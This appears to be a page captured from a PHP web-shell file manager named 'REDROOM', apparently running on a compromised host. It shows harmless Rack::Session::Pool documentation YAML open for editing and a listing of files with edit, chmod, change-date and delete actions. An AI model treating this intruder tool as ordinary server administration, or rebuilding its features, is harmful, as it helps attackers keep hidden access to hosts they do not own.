REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 1.42 KB
Close
/proc/thread-self/root/opt/alt/ruby18/lib64/ruby/gems/1.8/doc/rack-1.6.1/ri/Rack/Session/Pool/cdesc-Pool.yaml
Text
Base64
--- !ruby/object:RI::ClassDescription attributes: - !ruby/object:RI::Attribute comment: name: mutex rw: R - !ruby/object:RI::Attribute comment: name: pool rw: R class_methods: - !ruby/object:RI::MethodSummary name: new comment: - !ruby/struct:SM::Flow::P body: Rack::Session::Pool provides simple cookie based session management. Session data is stored in a hash held by @pool. In the context of a multithreaded environment, sessions being committed to the pool is done in a merging manner. - !ruby/struct:SM::Flow::P body: The :drop option is available in rack.session.options if you wish to explicitly remove the session from the session cache. - !ruby/struct:SM::Flow::P body: "Example:" - !ruby/struct:SM::Flow::VERB body: " myapp = MyRackApp.new\n sessioned = Rack::Session::Pool.new(myapp,\n :domain => 'foo.com',\n :expire_after => 2592000\n )\n Rack::Handler::WEBrick.run sessioned\n" constants: - !ruby/object:RI::Constant comment: name: DEFAULT_OPTIONS value: Abstract::ID::DEFAULT_OPTIONS.merge :drop => false full_name: Rack::Session::Pool includes: [] instance_methods: - !ruby/object:RI::MethodSummary name: destroy_session - !ruby/object:RI::MethodSummary name: generate_sid - !ruby/object:RI::MethodSummary name: get_session - !ruby/object:RI::MethodSummary name: set_session - !ruby/object:RI::MethodSummary name: with_lock name: Pool superclass: Abstract::ID
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 7
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
cdesc-Pool.yaml
1.42 KB
lrw-r--r--
2019-12-05 22:14:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
destroy_session-i.yaml
221 B
lrw-r--r--
2019-12-05 22:14:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
generate_sid-i.yaml
191 B
lrw-r--r--
2019-12-05 22:14:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
get_session-i.yaml
197 B
lrw-r--r--
2019-12-05 22:14:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
new-c.yaml
188 B
lrw-r--r--
2019-12-05 22:14:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
set_session-i.yaml
226 B
lrw-r--r--
2019-12-05 22:14:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
with_lock-i.yaml
199 B
lrw-r--r--
2019-12-05 22:14:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).